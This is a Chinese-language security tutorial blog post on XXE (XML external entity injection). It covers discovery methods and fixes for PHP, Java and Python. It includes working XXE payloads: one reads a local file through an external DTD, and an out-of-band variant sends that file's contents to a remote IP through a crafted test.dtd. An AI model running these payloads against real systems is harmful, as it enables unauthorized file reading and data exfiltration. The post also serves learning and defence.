XML&XXE&无回显&DTD实体&伪协议&代码审计

XML&XXE&无回显&DTD实体&伪协议&代码审计

XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XML External Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。

客户端:xml发送数据

服务端:xml解析数据

利用xml写一个带有文件读取的代码尝试发送,类似文件读取功能实现

无回显:要利用带外测试(利用dnslog来做测试!)

实体引用:引用远程的evil2.dtd文件

1.解决拦截防护绕过问题
<?xml version="1.0" ?>

<!DOCTYPE test [<!ENTITY % file SYSTEM "http://127.0.0.1:8081/evil2.dtd">

​    %file;

]>

<user><username>&send;</username><password>Mikasa</password></user>

evil2.dtd :该文件读取d:e.txt的内容

<!ENTITY send SYSTEM "file:///d:/e.txt">

##### 2.解决数据不回显的问题
<?xml version="1.0"?>

<!DOCTYPE ANY[

<!ENTITY % file SYSTEM "file:///d:/e.txt">

<!ENTITY % remote SYSTEM "http://47.109.33.184/test.dtd">

%remote;

%all;

]>

<root>&send;</root>

test.dtd

<!ENTITY % all "<!ENTITY send SYSTEM 'http://47.109.33.184/get.php?file=%file;'>">
XXE黑盒发现:

1、获取得到Content-Type或数据类型为xml时,尝试进行xml语言payload进行测试

2、不管获取的Content-Type类型或数据传输类型,均可尝试修改后提交测试xxe

流程:功能分析-前端提交-源码&抓包-构造Paylod测试

更改请求数据格式:Content-Type

XXE白盒发现:

1、可通过应用功能追踪代码定位审计

2、可通过脚本特定函数搜索定位审计

3、可通过伪协议玩法绕过相关修复等

XXE修复防御方案:

-方案1-禁用外部实体

PHP:

libxml_disable_entity_loader(true);

JAVA:

DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferences(false);

Python:

from lxml import etreexmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

-方案2-过滤用户提交的XML数据

过滤关键词:<!DOCTYPE和<!ENTITY,或者SYSTEM和PUBLIC


   转载规则


《XML&XXE&无回显&DTD实体&伪协议&代码审计》 Shmily 采用 知识共享署名 4.0 国际许可协议 进行许可。
 上一篇
log4j2漏洞复现 log4j2漏洞复现
log4j2漏洞复现 最近的特大漏洞log4j2的出现,也是掀起了安全圈的一个风暴呀,自己也尝试着来复现一下吧,毕竟慢慢成长嘛。 漏洞描述Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于J
2022-04-07
下一篇 
应用协议&Rsync&SSH&RDP&FTP&漏洞批扫&口令猜解 应用协议&Rsync&SSH&RDP&FTP&漏洞批扫&口令猜解
应用协议&Rsync&SSH&RDP&FTP&漏洞批扫&口令猜解用hydra爆破(弱口令爆破)FTP(端口:21):文本传输协议 (用户名随机) RDP(端口:3389),SSH(端口:
2022-03-14
  目录